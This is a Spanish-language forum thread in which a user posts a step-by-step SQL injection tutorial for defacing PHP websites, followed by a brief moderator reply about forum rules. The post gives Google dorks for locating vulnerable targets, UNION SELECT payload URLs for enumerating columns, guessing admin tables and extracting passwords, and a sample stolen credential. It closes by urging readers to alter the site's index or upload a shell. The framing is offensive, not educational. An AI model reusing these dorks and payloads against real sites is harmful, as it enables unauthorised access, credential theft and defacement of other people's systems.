Tutorial sql injection

Iniciado por abdelhaklashab, 2 Diciembre 2009, 02:41 AM

0 Miembros y 1 Visitante están viendo este tema.

abdelhaklashab

Tutorial Sql Injection Version 4

Por: abdelhaklashab

En este manual aprenderemos a defacear una web .php por el método sql injection versión 4

Primero tenemos que buscar una web que sea vulnerable podemos utilizar estos dorks para uscar en goolge:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=

2-bien aqui tenemos una web vulnerable
http://www.ejemplo.com/category.php?id=48
3- para saber si es vulnerbale borramos los números del final del link y ponemos una  '
De modo que quede asi

http://www.ejemplo.com/category.php?id='

si al hacer eso nos sale un error tipo asin
Error in query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND valid = '1' order by c_id' at line 1


bien ahora lo que haremos es buscar las columnas que tienen error
si no sale el error borramos el ' de mode que quede  asi
http://www.ejemplo.com/category.php?id=
y ponemos
-1+order+by+100—  al fianl del link
de modo que quede asi
http://www.ejemplo.com/category.php?id=1-order+by+100—

nos saldrá un error tipo asi    /column '100' in 'order clause'

ahora lo que haremos será bajar de poco en poco hasta ver el numero donde no sale ese error

pa que me entiendan  hay que hacer esto

http://www.ejemplo.com/category.php?id=-1+order+by+100--
sale el error bajamos 10 numero http://www.ejemplo.com/category.php?id=-1+order+by+90--
nos sigue saliendo el error volvemos a bajar
http://www.ejemplo.com/category.php?id=-1+order+by+80--
vamos bajarndo hasta que desaparesca el error en este caso
http://www.ejemplo.com/category.php?id=-1+order+by+15--
aki desaparece el error

bien ahora sabemos que hay 15 columnas con error

lo que tenemos que hacer ahora es
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

si en otro caso por ejemplo es 9 collumnas errores
www.example.es/categort.php?=-1+union+select+1,2,3,4,5,6,7,8,9--

bueno volvemos a nuestra web

http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

damos a enter

nos saldrán en la pagina unos números en este caso el 1,9,6
estos son las columnas que podemos utilizar

bien nosotros utilizaremos el 9
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15--
vamos al numero 9 y ponemos versión()
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
nos saldrá
4.1.20-community-nt

Bien ahora lo que tenemos que hacer es esto
Vlvemos el link a su estado osea quitamos eso de versión()
Y volvemos a poner el 9
Antes
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
ahora que quede asi
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
bien el siguiente paso
hacemos esto
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--
este link lo que ara es darnos el nombre de usuario
pones +from+admin  lo k utilizamos es (admin)
bien en este caso nos da error
bien ahora camiams admin por usuario
de modo que quede asi
from+usuario
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+usuario--

bien si en este caso nos da error vamos probando nombres hasta dar con uno
posibles nombres
admin,user,usuario,username,login,administradr,administrator.......
Depende de su imaginación
En este  caso es admin

http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--

bien no nos sale ningún nombre ni nungun error asi que el usuario es admin por defecto
ahora vamos a buscar la contraseña
os recordais de las columnas que tenían error
el 9,1,6 bien en estas columnas buscamos el pass
nosotros utilizaremos el 9 como siempre
también probaremos con
password,pass,contraseña,apass,entrada,loginpass,passw,passwo....vamos al 9 y vamos probando
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14,15+from+admin--
nos da error
vamos probando
en este caso es apass
http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,apass,10,11,12,13,14,15+from+admin--

bien ya tenemos el admin y el pass
admin:admin
contraseña: gigio2001
ya tenemos lo básico ahora falta lo mas importante de todo la pagina de administración
normalmente suele ser

/admin
/administrador
Vamos probando pero lo mas rápido
Es entrar aquí http://mormoroth.net/af/
Ponemos la pagina web y nos dara la agina de administración
Ahora lo tenemos todo
En este caso es admin
http://www.ejemplo.com/admin/
ponemos el pass y admin
y a disfrutar
cambiamos el index , modificamos lo que queramos o subimos la Shell..........infinidad de opciones.

Esto es todo si teneis alguna duda enviarme un mp o dejar el comentario


Por:abdelhaklashab

WHK

Hola, genial pero recuerda leer las reglas primero antes de crear post, no puedes ir publicando sitios webs externos con vulnerabilidades, lo que si puedes hacer es dar ejemplos o hacer tu publicación con un sitio web que sea algo mas público y no tan personal para evitar problemas con sus dueños.

Saludos.

PD: el post duplicado en el foro de bugs y exploits ya lo eliminé dejando solamente este.